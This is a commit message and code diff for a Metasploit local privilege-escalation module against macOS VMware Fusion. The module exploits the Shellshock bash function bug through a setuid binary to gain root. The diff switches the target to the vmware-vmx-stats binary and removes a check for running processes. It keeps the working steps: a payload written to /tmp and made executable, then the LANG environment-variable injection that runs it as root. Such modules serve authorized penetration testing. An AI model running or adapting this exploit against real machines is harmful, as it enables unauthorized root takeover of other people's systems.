Land rapid7#3885, @mubix's improvements to vmware root.

This prevents the need to kill any processes before getting root
privs, which is a good timesaver.

Author: jvennix-r7

modules/exploits/osx/local/vmware_bash_function_root.rb

@@ -25,7 +25,8 @@ def initialize(info={})
         [
           'Stephane Chazelas', # discovered the bash bug
           'juken', # discovered the VMWare priv esc
-          'joev' # msf module
+          'joev', # msf module
+          'mubix' # vmware-vmx-stats
         ],
       'References'    =>
         [
@@ -64,18 +65,8 @@ def check
   end
 
   def exploit
-    process_check = datastore['VMWARE_PATH'] + '/Contents/Library/VMware Fusion Services'
-    processes = cmd_exec("bash -c \"ps ax | grep '#{process_check}'\"").split("\n")
-    processes.delete_if { |p| p =~ /grep/ }
-
-    if processes.length > 0
-      print_error("VMware is already running the following processes:\n #{processes.join("\n")}")
-      print_error("These processes must be killed before exploiting.")
-      return
-    end
-
     payload_file = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"
-    path = '/Contents/Library/Open VMware Fusion Services' # path to the suid binary
+    path = '/Contents/Library/vmware-vmx-stats' # path to the suid binary
 
     print_status("Writing payload file as '#{payload_file}'")
     exe = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
@@ -84,7 +75,7 @@ def exploit
     cmd_exec("chmod +x #{payload_file}")
 
     print_status("Running VMWare services...")
-    cmd_exec("LANG='() { :;}; #{payload_file}' '#{datastore['VMWARE_PATH']}#{path}'")
+    cmd_exec("LANG='() { :;}; #{payload_file}' '#{datastore['VMWARE_PATH']}#{path}' /dev/random")
   end
 
 end